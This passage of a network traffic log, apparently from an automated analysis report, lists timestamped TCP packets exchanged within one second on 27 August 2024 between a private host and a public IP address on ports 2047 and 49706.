                                            Aug 27, 2024 18:23:41.172538042 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.172548056 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.172569036 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.174578905 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.175139904 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.175185919 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.175194979 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.175236940 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.179349899 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.179389954 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.179546118 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.179557085 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.179573059 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.179572105 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.179639101 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.179639101 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.182281971 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.182307005 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.182316065 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.182579041 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.184998035 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.185023069 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.185033083 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.185094118 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.187787056 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.187823057 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.187832117 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.187884092 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.190407991 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.190453053 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.190463066 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.190511942 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.190511942 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.193131924 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.193197966 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.193207026 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.193257093 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.195884943 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.195928097 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.195936918 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.195974112 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.199158907 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.199229002 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.199276924 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.199295998 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.199948072 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.200634003 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.201292992 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.201356888 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.201366901 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.201407909 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.203959942 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.203970909 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.204073906 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.204082966 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.204097033 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.205240965 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.206657887 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.206669092 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.206721067 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.206751108 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.206794977 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.206954002 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.209317923 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.209342003 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.209352016 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.209395885 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.212142944 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.212163925 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.212171078 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.212241888 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.214656115 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.214669943 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.214680910 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.214736938 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.217211008 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.217236996 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.217246056 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.217292070 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.220184088 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.220195055 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.220206022 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.220249891 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.220266104 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.222373962 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.222408056 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.222421885 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.222467899 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.224922895 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.224967003 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.224972010 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.224977016 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.225030899 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.227417946 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.227438927 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.227448940 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.227508068 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.230051041 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.230063915 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.230077982 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.230112076 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.230132103 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.232362032 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.232402086 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.232417107 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.232498884 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.235388041 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.235414028 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.235424042 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.235464096 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.235481977 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.237490892 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.237541914 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.237565041 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.237592936 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.241264105 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.241317987 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.241354942 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.241367102 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.241379023 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.241426945 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.243676901 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.243719101 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.243729115 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.243766069 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.243766069 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.246100903 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.246121883 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.246185064 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.246212006 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.246232033 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.246284962 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.248461008 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.248472929 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.248490095 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.248547077 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.250694036 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.250704050 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.250742912 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.250821114 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.250830889 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.250894070 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.253212929 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.253231049 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.253242016 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.253262997 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.253293037 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.255019903 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.255026102 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.255069017 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.255103111 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.255111933 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.255166054 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.256963968 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.256973982 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.257030010 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.257049084 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.257508993 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.257913113 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.259116888 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.259139061 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.259150028 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.259215117 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.260741949 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.260795116 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.260806084 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.260814905 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.260854959 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.262554884 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.262566090 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.262624025 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.262633085 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.262651920 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.262762070 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.264333010 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.264349937 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.264360905 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.264432907 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.266078949 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.266104937 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.266114950 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.266165018 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.266165018 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.267956018 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.267970085 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.267976999 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.268035889 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.269572973 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.269599915 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.269608974 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.269665956 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.269665956 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.271692038 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.271728992 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.271738052 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.271903992 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.273349047 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.273372889 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.273411989 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.273421049 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.273463964 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.273472071 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.274673939 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.274739981 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.274770021 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.274797916 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.274811029 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.275904894 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.277002096 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.277025938 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.277034998 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.277059078 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.277117014 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.278021097 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.278048992 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.278058052 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.278106928 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.279946089 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.280003071 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.280013084 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.280070066 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.281428099 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.281492949 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.281503916 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.281641006 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.282679081 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.282730103 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.282740116 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.282793045 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.282805920 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.285130024 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.285245895 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.285257101 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.285276890 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.285286903 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.285336018 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.285389900 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.286530018 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.286540031 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.286592960 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.286628962 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.286757946 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.286854029 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.288125038 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.288166046 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.288176060 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.288186073 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.290616989 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.291697025 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.291750908 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.291763067 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.291812897 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.291812897 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.291826010 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.292301893 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.292707920 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.292762041 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.292771101 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.292776108 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.294056892 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.294075966 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.294087887 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.294126034 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.294126987 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.295382977 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.295396090 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.295407057 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.295439005 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.295479059 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.296875000 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.296915054 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.296924114 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.297856092 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.298180103 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.298192024 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.298230886 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.298258066 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.298307896 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.298702002 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.299576044 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.299588919 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.299650908 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.299676895 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.299711943 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.300030947 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.301032066 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.301069975 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.301079988 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.301120043 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.302340031 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.302351952 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.302381992 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.302392006 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.302423000 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.302581072 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.303685904 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.303734064 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.303742886 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.303787947 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.305174112 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.305186033 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.305213928 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.305223942 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.305239916 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.306011915 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.306523085 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.306566000 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.306576014 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.306586981 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.306616068 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.307650089 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.307697058 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.307706118 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.307738066 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.309437037 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.309488058 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.309490919 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.309498072 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.310070992 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.310280085 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.310305119 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.310345888 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.310372114 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.310383081 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.310425997 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.311750889 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.311773062 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.311834097 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.311866045 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.311876059 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.311956882 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.314229965 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.314270973 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.314284086 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.314338923 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.314410925 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.314421892 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.314435005 CEST204749706154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:23:41.314490080 CEST497062047192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:23:41.314490080 CEST497062047192.168.2.7154.216.19.149
